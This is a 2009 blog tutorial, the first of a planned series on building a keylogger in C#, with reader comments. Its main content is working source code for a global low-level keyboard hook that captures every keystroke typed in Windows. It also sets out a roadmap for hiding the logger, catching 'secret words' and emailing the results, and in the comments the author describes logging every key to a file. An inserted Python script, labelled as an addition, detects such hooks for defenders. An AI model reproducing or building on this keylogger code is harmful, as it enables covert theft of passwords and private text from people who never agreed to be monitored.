Keylogger in C# :: Introduction
by Arxleol on Friday 06.02.2009, under C#, tutorial

It is a kind of obligation for every hacker to know, understand and speak several languages. Not languages in the sense of English and Russian, of course, but ones like C#, Java, NASM and so on. Without any real skill you will end up as just another script kiddie, without any respect. Knowing how to write one keylogger will not change this, but it will give you a head start.
Therefore, I have decided to show you, in a sequence of probably 5 tutorials, how to write a simple keylogger and do several other things. Depending on how this little project goes, I might extend it and add functionality like hiding it from the users of the computer, saving data and so on…
As always, we have an introduction to introduce some things. Yeah, speaking rubbish. One other thing worth mentioning is that for the keylogger to function like any other keylogger, we have to write a keyboard hook. To explain this quickly and simply: if we want to know what a user is writing in our own application while it has focus, we can simply use built-in functions like a key or mouse listener, but if we want to obtain what the user is writing in Firefox, we need a keyboard hook. In simple terms: our program will receive any character pressed on the keyboard, no matter where in Windows.
Keylogger series:
- Introduction
- Detecting pressed keys
- Saving content
- Hiding && unhiding Keylogger
- Catching secret words
- Sending emails.
- Finalization
- Complete project
This is a kind of roadmap for the keylogger series. I hope that I will have the time and resources to provide one tutorial each week for this series.
Introduction
As I have mentioned before, we will be using the following class. Please also note that to follow this tutorial you need at least some beginner's knowledge of programming concepts in either C# or Java, since in essence they are the same.
using System;
using System.Diagnostics;
//using System.Windows.Forms;
using System.Runtime.InteropServices;

namespace keyboardhook
{
    public static class Hook
    {
        //Similar class is on this site:
        //http://blogs.msdn.com/toub/archive/2006/05/03/589423.aspx
        private static class API
        {
            //dll imports for hooking and unhooking and sending events through hook hierarchy
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            public static extern IntPtr SetWindowsHookEx(
                int idHook, HookDel lpfn, IntPtr hMod, uint dwThreadId);

            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            [return: MarshalAs(UnmanagedType.Bool)]
            public static extern bool UnhookWindowsHookEx(
                IntPtr hhk);

            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            public static extern IntPtr CallNextHookEx(
                IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

            [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            public static extern IntPtr GetModuleHandle(
                string lpModuleName);
        }

        public enum VK
        {
            //Keycodes may be found on many internet sites.
            //Some keys are commented feel free to uncomment them, explanations are provided for uncommon ones ;)
            VK_LBUTTON = 0X01, //Left mouse
            VK_RBUTTON = 0X02, //Right mouse
            //VK_CANCEL = 0X03,
            VK_MBUTTON = 0X04,
            VK_BACK = 0X08, //Backspace
            VK_TAB = 0X09,
            //VK_CLEAR = 0X0C,
            VK_RETURN = 0X0D, //Enter
            VK_SHIFT = 0X10,
            VK_CONTROL = 0X11, //CTRL
            //VK_MENU = 0X12,
            VK_PAUSE = 0X13,
            VK_CAPITAL = 0X14, //Caps-Lock
            VK_ESCAPE = 0X1B,
            VK_SPACE = 0X20,
            VK_PRIOR = 0X21, //Page-Up
            VK_NEXT = 0X22, //Page-Down
            VK_END = 0X23,
            VK_HOME = 0X24,
            VK_LEFT = 0X25, VK_UP = 0X26, VK_RIGHT = 0X27, VK_DOWN = 0X28,
            //VK_SELECT = 0X29,
            //VK_PRINT = 0X2A,
            //VK_EXECUTE = 0X2B,
            VK_SNAPSHOT = 0X2C, //Print Screen
            VK_INSERT = 0X2D,
            VK_DELETE = 0X2E,
            //VK_HELP = 0X2F,
            VK_0 = 0X30, VK_1 = 0X31, VK_2 = 0X32, VK_3 = 0X33, VK_4 = 0X34,
            VK_5 = 0X35, VK_6 = 0X36, VK_7 = 0X37, VK_8 = 0X38, VK_9 = 0X39,
            VK_A = 0X41, VK_B = 0X42, VK_C = 0X43, VK_D = 0X44, VK_E = 0X45,
            VK_F = 0X46, VK_G = 0X47, VK_H = 0X48, VK_I = 0X49, VK_J = 0X4A,
            VK_K = 0X4B, VK_L = 0X4C, VK_M = 0X4D, VK_N = 0X4E, VK_O = 0X4F,
            VK_P = 0X50, VK_Q = 0X51, VK_R = 0X52, VK_S = 0X53, VK_T = 0X54,
            VK_U = 0X55, VK_V = 0X56, VK_W = 0X57, VK_X = 0X58, VK_Y = 0X59,
            VK_Z = 0X5A,
            VK_NUMPAD0 = 0X60, VK_NUMPAD1 = 0X61, VK_NUMPAD2 = 0X62, VK_NUMPAD3 = 0X63,
            VK_NUMPAD4 = 0X64, VK_NUMPAD5 = 0X65, VK_NUMPAD6 = 0X66, VK_NUMPAD7 = 0X67,
            VK_NUMPAD8 = 0X68, VK_NUMPAD9 = 0X69,
            VK_SEPERATOR = 0X6C, // | (shift + backslash)
            VK_SUBTRACT = 0X6D, // -
            VK_DECIMAL = 0X6E, // .
            VK_DIVIDE = 0X6F, // /
            VK_F1 = 0X70, VK_F2 = 0X71, VK_F3 = 0X72, VK_F4 = 0X73,
            VK_F5 = 0X74, VK_F6 = 0X75, VK_F7 = 0X76, VK_F8 = 0X77,
            VK_F9 = 0X78, VK_F10 = 0X79, VK_F11 = 0X7A, VK_F12 = 0X7B,
            //and for the 8 people in the world who do, I think they can live without using them
            VK_NUMLOCK = 0X90,
            VK_SCROLL = 0X91, //Scroll-Lock
            VK_LSHIFT = 0XA0, VK_RSHIFT = 0XA1, VK_LCONTROL = 0XA2, VK_RCONTROL = 0XA3,
            //VK_LMENU = 0XA4,
            //VK_RMENU = 0XA5,
            //VK_PLAY = 0XFA,
            //VK_ZOOM = 0XFB
        } //keycodes

        //There are detailed explanations for these functions on MSDNAA and implementations.
        public delegate IntPtr HookDel(
            int nCode, IntPtr wParam, IntPtr lParam);

        public delegate void KeyHandler(
            IntPtr wParam, IntPtr lParam);

        private static IntPtr hhk = IntPtr.Zero;
        private static HookDel hd;
        private static KeyHandler kh;

        //Creation of the hook
        public static void CreateHook(KeyHandler _kh)
        {
            Process _this = Process.GetCurrentProcess();
            ProcessModule mod = _this.MainModule;
            hd = HookFunc;
            kh = _kh;
            hhk = API.SetWindowsHookEx(13, hd, API.GetModuleHandle(mod.ModuleName), 0);
            //13 is the parameter specifying that we're gonna do a low-level keyboard hook
            //MessageBox.Show(Marshal.GetLastWin32Error().ToString()); //for debugging
            //Note that this could be a Console.WriteLine(), as well. I just happened
            //to be debugging this in a Windows Application
        }

        public static bool DestroyHook()
        {
            //to be called when we're done with the hook
            return API.UnhookWindowsHookEx(hhk);
        }

        //called when key is active
        private static IntPtr HookFunc(
            int nCode, IntPtr wParam, IntPtr lParam)
        {
            int iwParam = wParam.ToInt32();
            //depending on what you want to detect you can either detect keypressed or keyreleased also with a bit tweaking keyclicked.
            if (nCode >= 0 &&
                (iwParam == 0x100 ||
                 iwParam == 0x104)) //0x100 = WM_KEYDOWN, 0x104 = WM_SYSKEYDOWN
                kh(wParam, lParam);
            return API.CallNextHookEx(hhk, nCode, wParam, lParam);
        }
    }
}
There are comments in the code to help you with this one. Make sure you have this class, since it is the base of operations for everything else.
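From a defender's side, the pattern this class relies on (a user32 P/Invoke of SetWindowsHookEx called with hook id 13) is easy to look for in C# source or decompiler output. The triage script below is an added example, not code from the original tutorial; the names `resolve` and `triage`, the regexes and the constructed `SAMPLE` excerpt are assumptions of this example, and it is a text heuristic, not a C# parser.

```python
import re

# Win32 hook ids: 13 = WH_KEYBOARD_LL (the value used on this page), 2 = WH_KEYBOARD.
KEYBOARD_HOOK_IDS = {13: "WH_KEYBOARD_LL", 2: "WH_KEYBOARD"}

# A user32 P/Invoke declaration, allowing extra attributes such as [return: ...].
PINVOKE = re.compile(r'\[DllImport\(\s*"user32(?:\.dll)?"[^\]]*\]\s*(?:\[[^\]]*\]\s*)*'
                     r'[\w\s]*?\bextern\b[^;(]*?\b(\w+)\s*\(', re.I)
# First argument of any SetWindowsHookEx(...) call or declaration.
CALL = re.compile(r'\bSetWindowsHookEx[AW]?\s*\(\s*([^,)]+?)\s*,')

def resolve(arg, source):
    """Return the hook id as an int, or None (e.g. for the declaration's 'int idHook')."""
    for _ in range(2):                      # a literal, or one hop through a const
        try:
            return int(arg, 0)              # accepts 13 and 0xD alike
        except ValueError:
            m = re.fullmatch(r'\w+', arg) and re.search(
                r'\bconst\s+int\s+' + re.escape(arg) + r'\s*=\s*(\w+)\s*;', source)
            if not m:
                return None
            arg = m.group(1)
    return None

def triage(source):
    """Summarise keyboard-hook indicators found in C# source text."""
    imports = {m.group(1) for m in PINVOKE.finditer(source)}
    hooks = []
    for m in CALL.finditer(source):
        hook_id = resolve(m.group(1), source)
        if hook_id in KEYBOARD_HOOK_IDS:
            hooks.append((source.count("\n", 0, m.start()) + 1, KEYBOARD_HOOK_IDS[hook_id]))
    return {"declares_hook_api": "SetWindowsHookEx" in imports,
            "keyboard_hooks": hooks,        # (line number, hook type) per call site
            "unhooks": "UnhookWindowsHookEx" in imports}

# Constructed sample: declarations and call site condensed from the class above.
SAMPLE = '''
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr SetWindowsHookEx(int idHook, HookDel lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
hhk = API.SetWindowsHookEx(13, hd, API.GetModuleHandle(mod.ModuleName), 0);
'''

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A hit only says that a program installs a global keyboard hook; hotkey utilities and accessibility tools do the same, so treat it as a lead for review and not as a verdict.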
Friday 24.04.2009 on 14:54
May I ask when will you finish the first parts of the guide? I just started to be interested in all of this and I want to know how to make a keylogger.
Saturday 25.04.2009 on 16:31
I will try to do it as soon as possible.
Wednesday 29.04.2009 on 16:45
Hello
For the KeyHandler routine, could I just create a small function to open a text file and write the data fed to it to the file?
Wednesday 29.04.2009 on 17:20
In my final implementation, I have something similar or maybe the same as you.
Each key pressed on the keyboard (small tweak is required for mouse keys) is recorded or shall I say written to one txt file.
Thursday 30.04.2009 on 13:59
There is obviously a lot to know about this. I think you made some good points in Features also.
Thursday 07.05.2009 on 12:49
[...] Arxleol on Thursday 07.05.2009, under C#, vista, xp Now I take that you did in fact check my introduction to this topic of keylogger. If you did then you may proceed if you did not then I would suggest [...]
Friday 29.05.2009 on 22:23
Nice tutorial, can’t wait for the followers. Have been looking all over the internet and finally found something which looks great.
Friday 29.05.2009 on 22:35
Thanks, my pleasure.
Sunday 15.11.2009 on 09:55
How do you exactly tweak to detect ONLY a keyUp or KeyDown? I want to avoid catching lots of keys when a key is pressed for a bit longer.
Wednesday 06.01.2010 on 02:08
Check out detecting pressed keys.
Ax
Tuesday 27.04.2010 on 17:30
This is an excellent tutorial! The only one on the internet that I can get to work. I'm not actually making a keylogger, but I used the global key hook in one of my own projects. I need to detect a left mouse click though, but I can't get it to work, I tried adding it to the case/switch, but nothing happens.
Wednesday 28.04.2010 on 15:21
The following are to be used to recognize mouse click.
VK_LBUTTON = 0X01, //Left mouse
VK_RBUTTON = 0X02, //Right mouse
//VK_CANCEL = 0X03,
VK_MBUTTON = 0X04,
You have to add them to the switch part, and after that you can detect them by checking the code in the temp variable.
If you need further instruction please do ask.
Regards.
Wednesday 28.04.2010 on 20:16
Yes, I did add it to the switch part like this:
case Hook.VK.VK_LBUTTON: temp = "Left mouse";
break;
and at the end, I put
MessageBox.Show(temp);
but nothing happens when I click the Left mouse buttons (all the keyboard keys work though), so I don't know what the problem is. Anyway, thanks for replying.
Thursday 06.05.2010 on 17:53
I have a problem, I don't quite understand what
>= 0 && is for in the if code
if (nCode >= 0 &&
(iwParam == 0x100 ||
iwParam == 0x104)) //0x100 = WM_KEYDOWN, 0x104 = WM_SYSKEYDOWN
kh(wParam, lParam);
Sunday 09.05.2010 on 12:50
It's for detecting which action you did. As explained in comment. Leave it be, you are probably not interested in that part anyway.